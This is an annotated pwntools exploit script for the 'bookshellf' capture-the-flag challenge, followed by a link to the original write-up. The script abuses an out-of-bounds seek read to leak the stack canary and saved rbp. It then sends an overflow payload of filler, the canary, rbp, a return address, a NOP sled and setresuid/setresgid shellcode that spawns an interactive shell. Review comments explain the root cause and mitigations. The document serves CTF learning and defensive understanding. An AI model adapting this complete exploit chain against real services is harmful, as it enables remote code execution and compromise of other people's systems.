
# Exploit script for the "bookshellf" challenge (binary name taken from the
# commented-out local process line below), driving the service over pwntools.
# Flow: (1) leak the stack canary, (2) leak the saved rbp, (3) send one
# overlong input that overwrites the saved frame and returns into shellcode.
#
# NOTE(review): written against Python 2 / the str-based pwntools API --
# sendline() is given str, recvn() output is concatenated with "\x00", and a
# single byte is compared with "\x7f". On Python 3 pwntools these would need
# bytes (b"...") and getrbp[5] would be an int, so this file is not portable
# as-is.
from pwn import *

# Target is a 64-bit Linux binary; asm()/shellcraft below depend on this.
context.os = 'linux'
context.arch = "amd64"

#r = process("./bookshellf")
r = remote("challenges.hackover.h4q.it", 31337)

# using the book 'seek' function we can read past the array boundary and leak memory
# we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set)
#
# Defender's view: the root cause is the unchecked seek index (out-of-bounds
# read). That single primitive defeats two mitigations at once -- the canary
# (its value is read back) and stack ASLR (a saved frame pointer is read
# back) -- and the absence of NX then lets the stack itself be executed.
# Bounds-checking the index, building with NX/PIE, and keeping the canary
# unreadable would each remove a link of this chain.

## Get stack canary

# Menu option 1, wait for the prompt, then discard any pending output.
r.sendline("1")
r.recvuntil(">")
r.clean()

# Book to open, then answer the "continue?" prompt with a seek command.
r.sendline("memory.txt")
r.recvuntil("continue?")
r.sendline("s30729") # last byte of stack canary is a null byte (probably ubuntu: http://phrack.org/issues/67/13.html)

r.recvuntil("more love!\n\n\n")

# Only 7 bytes come back; the low (null) byte is prepended to rebuild the
# full 8-byte canary (little-endian).
canary = u64("\x00"+r.recvn(7))
log.info("Got the stack canary: 0x%x" % canary)

# Decline to continue, return to the menu, drain.
r.sendline("n")
r.recvuntil(">")
r.clean()

## Get rbp

# Same menu/book sequence, seeking 7 bytes further than the canary read.
r.sendline("1")
r.recvuntil(">")
r.clean()
r.sendline("memory.txt")
r.recvuntil("continue?")
r.sendline("s30736")

r.recvuntil("more love!\n\n\n")
# 6 bytes of the saved rbp are read; the check on the top byte is a sanity
# test that the value looks like a user-space stack address (0x7f...).
# NOTE(review): `assert` is stripped under `python -O`; a plain `if`/raise
# would make this check unconditional.
getrbp = r.recvn(6)
assert getrbp[5] == "\x7f"
# Pad the two missing high bytes with zeros to form a full 8-byte pointer.
rbp = u64(getrbp + "\x00\x00")

log.info("rbp is at 0x%x" % rbp)

r.sendline("n")
r.recvuntil(">")
r.clean()

## Smash it!

r.sendline("1")
r.recvuntil(">")
r.clean()

# Payload layout (as constructed on this line): filler up to the canary slot,
# the leaked canary (so the stack-protector check passes), the leaked saved
# rbp, a return address pointing a little past the saved frame (into the NOP
# sled that follows), then the NOP sled and shellcode.  Everything after the
# return address lands on the stack and is executed directly, which is only
# possible because the stack is not NX-protected (see author's note above).
r.sendline("A"*31304 + p64(canary) + p64(rbp) + p64(rbp+32) + "\x90"*100 + asm(shellcraft.setresuid(1001,1001,1001) + shellcraft.setresgid(1001,1001,1001) + shellcraft.sh()))
# Hand the connection over to the user once the shell is spawned.
r.interactive()

Original writeup (https://gist.github.com/c3c/1407e165d925026e018662b7d7d4d5c6).